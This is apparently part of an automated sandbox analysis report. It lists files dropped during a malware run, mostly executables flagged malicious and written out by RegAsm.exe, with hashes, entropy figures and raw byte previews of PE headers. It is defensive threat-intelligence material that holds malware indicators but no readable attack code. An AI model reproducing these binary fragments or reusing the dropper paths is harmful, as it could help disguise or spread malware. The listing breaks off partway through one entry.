                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):423328
                                                                                                                                                                                                                                Entropy (8bit):7.9889468260390535
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:A463E516041F4BC84F03BC8FE2B643DD
                                                                                                                                                                                                                                SHA1:5A3EC50E94565671531E1CE66C2EE1D1A88A0E09
                                                                                                                                                                                                                                SHA-256:68024EBC8676FEB8C4B480F5042A8FE8F108A88FC20FC6DBFC3CF92707F148B8
                                                                                                                                                                                                                                SHA-512:5657068CF82679A6CC5636FE4F465834F9340EF0C48A35CA412988F50909922654291BED9178B8990EBA2430569E1EBECD45CAD119C5A524616C75187D4DABDE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H........*..............................................................p....C...~V...{..S..gi.~f..<......(.Q>;&.&...F+.&/.g..c^.,q.v...[0..BW.e.P}..........(.....D.(D.h]....2..1.P..3@K........0JX....r...yJ.&...g....A...G..R`...6..t....<40........9.. !G..W*.`..6 #..D..7.;.{...-..4...TQ.0Vs..U..!DU..).np...!..l.S...H......A.D_.d...N.15.ouP...r.G..;.$qt.y...I.'...'...]?......d.........s<;(.yd3..4.:..U. .......n.9....u-![...~p..e.8....n.Cn`..8.q...J.L..$F.

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):418816
                                                                                                                                                                                                                                Entropy (8bit):6.7434348766555265
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:2F59FBD6623872FBDC2F63D18023BFDA
                                                                                                                                                                                                                                SHA1:A71FD212DC780EDD062584ACFE3FC28A8090D039
                                                                                                                                                                                                                                SHA-256:0C50705ED7CFC68F11AECD4CEE0B808934D4957672AC0EA0615E9A1C31870A52
                                                                                                                                                                                                                                SHA-512:BD2CAEB7E88B333B31A864B66FE7B14CDF86560B488AE2B911893A059E184E7A80F0EDE8423AC8C10DE2BCFF3F5A85D1477F0A2E74986066F69D636D159B62F8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M............f......f./....f...\...."..........f......f.+....f.,....Rich...........PE..L.....%d.................H..........~>.......`....@.........................................................................J..x..................................LK...............................*..@...............$............................text...jG.......H.................. ..`.data........`...Z...L..............@....rsrc..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3129722
                                                                                                                                                                                                                                Entropy (8bit):7.997346351250425
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:1905889C50091A12A2B3A94E525A3566
                                                                                                                                                                                                                                SHA1:EAB0E89754662700424884B4A7461EDE47367A9B
                                                                                                                                                                                                                                SHA-256:063DCD646F6D386E80C4B4130D2A7925BDD18DC28C48106F1DAA0AF5845B50BE
                                                                                                                                                                                                                                SHA-512:2D35DD799938B82F82DF4426E01B676636F2ACC7581C4F910F5885A2E021D1543D010462A024AD0428140A8AAC60CC24D9554C26274BDA1C0204F533562D7883
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1075200
                                                                                                                                                                                                                                Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exegmoZLMPgmA7iERod (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1075200
                                                                                                                                                                                                                                Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):423328
                                                                                                                                                                                                                                Entropy (8bit):7.989339766042097
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:92C66C140509B75BAE23F055D427AFB4
                                                                                                                                                                                                                                SHA1:1ECC289391AD3FCB89B3E84CBB15944A10444AE0
                                                                                                                                                                                                                                SHA-256:CC73160C4AF628FE13B6C3E83E06C5565FF67818B4148C13025786779BD4E127
                                                                                                                                                                                                                                SHA-512:0B8C7E30AF4F74BA7A49F106388172C025A008D0F7DE13B88C0340AB0AC9B3611D66429257D65DEE5459E5AEBE78F472E1AA3E687009365DE3E36FF166D4366D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H........*...............................................................j....(.m........u..B...+..g....M.....D..g..%n.w..M..O....@...f...[a....`.3..y..\L..y...G.........8...n..E.up.flqh...:...1H.C.................i..]6*..NgV...F.....t.A...b..h...\........r...&.&*kM.....Pa.FG....-I.%...T....'.|z.A......Sh.../......F...@...F.&...l...s.....J..F....j..5.e7....O.h..-k..U.N..`.........v.....^....S..;v.^..?.!.ZQx..^..Sh.4 .^..\.@.....-b.7..?......7+8....1....T6.

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):11496960
                                                                                                                                                                                                                                Entropy (8bit):7.95681767955623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:D60D266E8FBDBD7794653ECF2ABA26ED
                                                                                                                                                                                                                                SHA1:469ED7D853D590E90F05BDF77AF114B84C88DE2C
                                                                                                                                                                                                                                SHA-256:D4DF1ABA83289161D578336E1B7B6DAF7269BB73ACC92BD9DFA2C262EBC6C4D2
                                                                                                                                                                                                                                SHA-512:80DF5D568E34DFC086F546E8D076749E58A7230ED1AA33F3A5C9D966809BECADC9922317095032D6E6A7ECDFBFBCE02A72CC82513AB0D132C5FFA6C07682BD87
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....+.f..........#.................]p.........@.............................`............ .....................................................<....P......@...`*...........................................F..(.......8............... ............................text...6........................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..p.-......................... ..`.text1..X...........................@....text2...`.......b..................`..h.rsrc........P.......h..............@..@........................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3141632
                                                                                                                                                                                                                                Entropy (8bit):7.172503458895126
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:1FEDF314D7C5ED06FF6833C9C8FE5441
                                                                                                                                                                                                                                SHA1:AC0F8C841D197A3DB368A3C646D242541ECE144B
                                                                                                                                                                                                                                SHA-256:279AF267D365013227156575DCF61B6977CE4051DD4632515BD224314CEA7C59
                                                                                                                                                                                                                                SHA-512:6328A2828A77FDAC906710552842A584208066033119F62AE0E97DA88DB37C35C02D368B554E58030D949E2DAD19715BF351284332706D939F8C6754D4DC9242
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................)..........)).. ...@)...@.. .......................`0...........@..................................)).K....`)......................@0.....O)).............................................. ............... ..H............text.....).. ....)................. ..`.sdata.......@).......).............@....rsrc........`).......).............@..@.reloc.......@0......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):361336
                                                                                                                                                                                                                                Entropy (8bit):7.9885937954241255
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:D687AF3B103399AA245807BB719878B7
                                                                                                                                                                                                                                SHA1:C3D45032BFD13C7DC75F08E55CABA56D0A1D4A42
                                                                                                                                                                                                                                SHA-256:CC7056857CEC7D81101AF02D79431F4E193090FEF7D505D1970D4B2846F385B9
                                                                                                                                                                                                                                SHA-512:8482B42FB16963BDCC6BCE162F79F64E28BFA46977788DF2044A7A0E805E67D44991C6EF24E1DD45643C7F69ABC66DEB257F23E7680B25DA8C486DC5BA0FF978
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................P...........n... ........@.. ....................................`..................................n..S....................Z..x)..........`m............................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............X..............@..B.................n......H........^................................................................$....sp...k.Ta.....|.K..?wN...-..m..E...C.9..-#....f..=...5spJ......z.s.._4v.ZUO.w...b...ne.sR..v@sO.4.] ......V.L.....TV[.X.vF......|..hI*..$<gb...v-Cm<[6R...8..!m..........'.?j....W`JI..!k........,.O.<9..W...X..LEq.... !......Q..$.@....,99..~...%(...\..|B..#.a... ......w..ZV..9.k..F.Zl........[.O..t....Gz&..c..yk&.N..;........T.fh.]Z.%....).=...-.Ig..T....*1.!..z...E...9.....x.

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):222112
                                                                                                                                                                                                                                Entropy (8bit):7.96837916071809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:EA754070163F8ECA914B259096D834F0
                                                                                                                                                                                                                                SHA1:CEBF2ECCAD67DEAF6AC9B8DC71118AD474B16868
                                                                                                                                                                                                                                SHA-256:A893E20FEA08C8615DE1775AD3559EA6EFF35B5EC3B1AB6F463924285A84F47F
                                                                                                                                                                                                                                SHA-512:2A75B505780C6670204F5C4E2818BB1B027C88E98C9C45DDE39AED786AFAEFF60215AFB278FDD89EED58639C9ECCF901836DA4329D3C62C03911992B923CA225
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..f.............................(... ...@....@.. ....................................`..................................(..S....@..............x=..(&...`......`'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......................................................................$..hII#MtzNi.T.............`...&g~....n~^..r.b..f.r.Ga.x.|....}.Ib....PL:d.6... ......:E$7....e.aW...!..m5..5@..7W...........H:....+.(g...\[.k.z5.b....yd.)8....]K.._.}oB$......<]....K..%...On..j...nA}.P^.f.6Z|.._*..XcsF^....O].CQ..w...*.K..ts........F...H...].?WT>"f.].*..v.......$_...Lm.?.AO[9....e.8.~.e.....]NH.[L7\C...I.{.|.A....\..F.L;M..CG.:..d..K>.....6"b..Ofy...u8...:.&.Qe7

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22487040
                                                                                                                                                                                                                                Entropy (8bit):5.272510082812899
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:CB3952F1852179348F8D2DB91760D03B
                                                                                                                                                                                                                                SHA1:4D2C9D9B09226524868760263C873EDC664456A9
                                                                                                                                                                                                                                SHA-256:A9EA40670A686E175CC8C32E3FC6BA92505379303D6524F149022490A2DDA181
                                                                                                                                                                                                                                SHA-512:163006435A30B31FF0B079215EFC0CEDF6A624516AF1FFCCBC6144CFDB205B822029D523F28EC86E0391AF1B741771B860CF4D3492C87567A55F541A39C69D11
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..h...W..,.............@..............................`......*W...`... ...................................... Z.N....0Z.X....pZ......pM..f...........`\..P..........................._M.(....................4Z.X............................text... .h.......h.................`.``.data....+....i..,....h.............@.`..rdata...-...@p......&p.............@.`@.pdata...f...pM..h...TM.............@.0@.xdata..`.....P.......P.............@.0@.bss.....+....P.......................`..edata..N.... Z.......P.............@.0@.idata..X....0Z.......P.............@.0..CRT....p....PZ.......P.............@.@..tls.........`Z.......P.............@.@..rsrc........pZ.......P.............@.0..reloc...P...`\..R....R.............@.0B................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6666862
                                                                                                                                                                                                                                Entropy (8bit):6.624649438102188
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:8FB3610C4BA81A5A93666562E712740A
                                                                                                                                                                                                                                SHA1:FB8B6774E490680C1E04494D101F6CED3B7BE816
                                                                                                                                                                                                                                SHA-256:8F72E50FAC72D3C5880F79997F6CF38026B00D6F907BCD80C5D780CF92DB7158
                                                                                                                                                                                                                                SHA-512:6A833782EB81204D420841ACC1CD0D5F03BCE00D9725D850E5EF83A5C39C084E7BD1285582531A4092565BE9FA8409A7CFBCC0B74A5CEFD6DFAF9D4E4F5FD5CB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}.f.t_..%.........#.@H...Z...f..........PH...@.................................).f....... .........................B......................................h ............................H....................................................text....>H......@H.................`.P`.data........PH......FH.............@.`..rdata..8....pH......`H.............@.`@/4............I.......H.............@.0@.bss....T.f...L.......................`..edata..B.............L.............@.0@.idata................L.............@.0..CRT....4.............L.............@.0..tls.................L.............@.0..reloc..h ......"....L.............@.0B/14...................Z.............@..B/29......... ........Z.............@..B/41.....XL.......N...|\.............@..B/55.....B.... ........\.............@..B/67.....T.............].............@.0B/80.....a....0........].

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3037032
                                                                                                                                                                                                                                Entropy (8bit):6.781602952551882
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:098E15E88E5332253356C78BADF8D479
                                                                                                                                                                                                                                SHA1:D5AAEB94EC0D92BD9AA7D4B76860E9C25CF10EE2
                                                                                                                                                                                                                                SHA-256:6B89CDFE0D3EBC90994EE564AAC9C88B0DF80F25720AEDADFF660A0D079AD0C9
                                                                                                                                                                                                                                SHA-512:27E7480332F7F07916399D9515057750E43F42D68AEBA095C77AB76616F899F49269EC78738F10D39D6869F67FF4EF768C03BA52A649C652AFA9EE161F2E1892
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$......... ...N...N...N......N.`6....N...K...N.#i....N.#i...N...M...N...J..N...K..N...O...N..P5...N.i.O..N...O.:.N.i.K..N.i.N...N.l....N.......N.i.L...N.Rich..N.........................PE..L.....%`.................8...........$.......P....@...................................!...@..........................%.....T...\.... ...f...........>..h............)..T...................D*.......)..@............P...............................text....@.......8.................. ..`.rdata...0...P...(...<..............@..@.data............n...d..............@....tls................................@....gfids..............................@..@.rsrc....f... ...h..................@..@........................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):331640
                                                                                                                                                                                                                                Entropy (8bit):7.987353721341769
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:E8E6CD9EC48FAFCCC174F7BF07D045E2
                                                                                                                                                                                                                                SHA1:0DFCCF235DC62D2592F5062A1B9691043C14CC9E
                                                                                                                                                                                                                                SHA-256:76B4E6A99335D5FFA35E15863B544BF2EC9ED76CC8320E1D3E2F521A27018D07
                                                                                                                                                                                                                                SHA-512:33E6C097784B29D3CBA17B751B3E87EA9D583DBF19646897843471F96EFD88E9B64D529A5F2C9FA13B9EDAD5D7CCF8D454E496FC63F1B288C44FD8509E8C1459
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..f............................^.... ........@.. .......................@............`.....................................S.......................x)... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H...........................................................................6.....Z...9)..^........j...PtY.#..A.R.\...d.4..7.Z..&w.w|.5.':.T..*~...x....T...7M.w.Sa...Qp.R.t.u...qzD(&...4.. .:O.d....V[. c..l.prK.]..v....Y\_.{.....'..T.-f..av...w(H.n.]..gpj)...OKV.......q..Q..*y.P.!..Y;O.0.....@.y...t.".u...7n.B.=.......C^.=.Mi......4......b.~..t..d.......#......Xa`.I\.R!...'}>.}..X...J.v.__...n.....\..f.'>...}....."..j(..vFQC..'l..'7..p..:............

                                                                                                                                                                                                                                C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):976632104
                                                                                                                                                                                                                                Entropy (8bit):0.04563192849725171
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:CD0A0C5A7305A1E9A9C9F8B609732DB1
                                                                                                                                                                                                                                SHA1:E24EF707F3044865524ACF986401F4A8F60CC9EE
                                                                                                                                                                                                                                SHA-256:9399ED901C69CFDA8B3E5FAB16A499FF927A3975AE5B1077C0A2C810D6193A81
                                                                                                                                                                                                                                SHA-512:1C205C5697CA39DCE1AD5FC3EFE0D8E6E4B783B89A3DF8F33D5B97667338AC8134FC1E989F04550BD47B5A32ACED85A8CE245FAC7F84514C0CAC674A17089523
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$......... ...N...N...N......N.`6....N...K...N.#i....N.#i...N...M...N...J..N...K..N...O...N..P5...N.i.O..N...O.:.N.i.K..N.i.N...N.l....N.......N.i.L...N.Rich..N.........................PE..L.....%`.................8...........$.......P....@...................................!...@..........................%.....T...\.... ...f...........>..h............)..T...................D*.......)..@............P...............................text....@.......8.................. ..`.rdata...0...P...(...<..............@..@.data............n...d..............@....tls................................@....gfids..............................@..@.rsrc....f... ...h..................@..@........................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                Entropy (8bit):4.401285265674409
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:A0C7F9277CC4BE5B6741088512A6ABC1
                                                                                                                                                                                                                                SHA1:00F13026DBCCDD9D03F937AE065590F48D1173DD
